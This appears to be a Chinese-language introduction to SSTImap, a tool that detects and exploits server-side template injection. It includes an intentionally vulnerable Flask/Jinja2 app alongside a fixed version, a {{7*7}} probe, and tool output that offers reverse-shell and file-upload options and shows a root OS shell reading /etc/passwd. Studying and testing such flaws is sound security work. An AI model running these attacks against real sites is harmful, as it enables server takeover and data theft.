关于SSTImap
SSTImap是一款功能强大的渗透测试工具,该工具提供了一个交互式接口,可以帮助广大研究人员以自动化的形式检查网站的代码注入和服务器端模版注入漏洞。除此之外,该工具甚至还可以帮助我们自动利用这些发现的漏洞,从而访问目标服务器(主机)操作系统。
该工具还引入了沙盒逃逸技术,具体细节请查阅文章结尾的参考资料。
值得一提的是,该工具能够利用一些代码上下文转义和盲注场景。并且支持Python、Python、Ruby、PHP、Java和通用的未标记模板引擎中类似eval()的代码注入。
工具下载
由于该工具基于Python开发,因此我们首先需要在本地设备上安装并配置好Python环境。接下来,我们可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/vladko312/SSTImap.git
然后切换到项目目录中,并使用pip命令和项目提供的requirements.txt安装该工具所需的依赖组件:
cd SSTImap pip install requirements.txt
工具使用
服务器端模版注入
下面给出的是一个使用Flask框架(Python)和Jinja2模版引擎开发的简单网站样例,它使用了一种不安全的方法来整合用户提供的name变量,并在渲染之前和模版字符串连接:
from flask import Flask, request, render_template_string import os app = Flask(__name__) @app.route("/page") def page(): name = request.args.get('name', 'World') # SSTI VULNERABILITY: template = f"Hello, {name}!<br>\n" \ "OS type: {{os}}" return render_template_string(template, os=os.name) if __name__ == "__main__": app.run(host='0.0.0.0', port=80)
使用这种模版不仅会产生XSS漏洞,而且还会允许攻击者注入模版代码,而这些代码将在目标服务器上执行,从而导致SSTI:
$ curl -g 'https://www.target.com/page?name=John' Hello John!<br> OS type: posix $ curl -g 'https://www.target.com/page?name={{7*7}}' Hello 49!<br> OS type: posix
用户提供的输入应该通过更安全的方式来引入:
from flask import Flask, request, render_template_string import os app = Flask(__name__) @app.route("/page") def page(): name = request.args.get('name', 'World') template = "Hello, {{name}}!<br>\n" \ "OS type: {{os}}" return render_template_string(template, name=name, os=os.name) if __name__ == "__main__": app.run(host='0.0.0.0', port=80)
预定模式
SSTImap的预定模式与Tplmap非常相似,支持以多种不同的模版检测和利用SSTI漏洞。成功利用漏洞后,SSTImap将能够给研究人员提供代码评估、操作系统OS命令执行和对文件系统的操作访问权。
如需检测URL,你可以使用-u参数:
$ ./sstimap.py -u https://example.com/page?name=John ╔══════╦══════╦═══════╗ ▀█▀ ║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═ ║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __ ╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \ ╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) | ╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/ │ | | |_| [*] Version: 1.0 [*] Author: @vladko312 [*] Based on Tplmap [!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] Testing if GET parameter 'name' is injectable [*] Smarty plugin is testing rendering with tag '*' ... [*] Jinja2 plugin is testing rendering with tag '{{*}}' [+] Jinja2 plugin has confirmed injection with tag '{{*}}' [+] SSTImap identified the following injection point: GET parameter: name Engine: Jinja2 Injection: {{*}} Context: text OS: posix-linux Technique: render Capabilities: Shell command execution: ok Bind and reverse shell: ok File write: ok File read: ok Code evaluation: ok, python code [+] Rerun SSTImap providing one of the following options: --os-shell 弹出交互式操作系统 --os-cmd 执行操作系统命令 --eval-shell 在模板引擎基础语言上输入交互式Shell --eval-cmd 评估模板引擎基础语言中的代码 --tpl-shell 弹出模版引擎上的交互式 --tpl-cmd 向模版引擎注入代码 --bind-shell PORT 连接至绑定了目标设备端口的Shell --reverse-shell HOST PORT 向攻击者设备端口发送回Shell --upload LOCAL REMOTE 向服务器上传文件 --download REMOTE LOCAL 下载远程文件
使用--os-shell选项可以在目标设备上启动一个伪终端:
$ ./sstimap.py -u https://example.com/page?name=John --os-shell ╔══════╦══════╦═══════╗ ▀█▀ ║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═ ║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __ ╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \ ╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) | ╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/ │ | | |_| [*] Version: 0.6#dev [*] Author: @vladko312 [*] Based on Tplmap [!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] Testing if GET parameter 'name' is injectable [*] Smarty plugin is testing rendering with tag '*' ... [*] Jinja2 plugin is testing rendering with tag '{{*}}' [+] Jinja2 plugin has confirmed injection with tag '{{*}}' [+] SSTImap identified the following injection point: GET parameter: name Engine: Jinja2 Injection: {{*}} Context: text OS: posix-linux Technique: render Capabilities: Shell command execution: ok Bind and reverse shell: ok File write: ok File read: ok Code evaluation: ok, python code [+] Run commands on the operating system. posix-linux $ whoami root posix-linux $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin
交互模式
在交互式模式下,我们可以使用命令与SSTImap交互:
-i:进入交互模式;
-u:制定测试目标URL;
run:命令运行;
help:查看帮助信息;
Ctrl+C:终止运行;
支持的模版引擎
SSTImap支持多种模版引擎和类eval()注入,列表如下:
引擎 | 远程代码执行 | 盲注 | 代码评估 | 文件读取 | 文件写入 |
Mako | ✓ | ✓ | Python | ✓ | ✓ |
Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |
Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |
Tornado | ✓ | ✓ | Python | ✓ | ✓ |
Nunjucks | ✓ | ✓ | JavaScript | ✓ | ✓ |
Pug | ✓ | ✓ | JavaScript | ✓ | ✓ |
doT | ✓ | ✓ | JavaScript | ✓ | ✓ |
Marko | ✓ | ✓ | JavaScript | ✓ | ✓ |
JavaScript (code eval) | ✓ | ✓ | JavaScript | ✓ | ✓ |
Dust (<= dustjs-helpers@1.5.0) | ✓ | ✓ | JavaScript | ✓ | ✓ |
EJS | ✓ | ✓ | JavaScript | ✓ | ✓ |
Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |
Slim | ✓ | ✓ | Ruby | ✓ | ✓ |
ERB | ✓ | ✓ | Ruby | ✓ | ✓ |
Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |
Smarty (secured) | ✓ | ✓ | PHP | ✓ | ✓ |
PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |
Twig (<=1.19) | ✓ | ✓ | PHP | ✓ | ✓ |
Freemarker | ✓ | ✓ | Java | ✓ | ✓ |
Velocity | ✓ | ✓ | Java | ✓ | ✓ |
Twig (>1.19) | × | × | × | × | × |
Dust (> dustjs-helpers@1.5.0) | × | × | × | × | × |
许可证协议
本项目的开发与发布遵循GPL-3.0开源许可证协议。
项目地址
SSTImap:【GitHub传送门】
参考资料
https://github.com/epinna/tplmap/
http://blog.portswigger.net/2015/08/server-side-template-injection.html
https://artsploit.blogspot.co.uk/2016/08/pprce2.html
https://opsecx.com/index.php/2016/07/03/server-side-template-injection-in-tornado/
https://github.com/epinna/tplmap/issues/9
http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine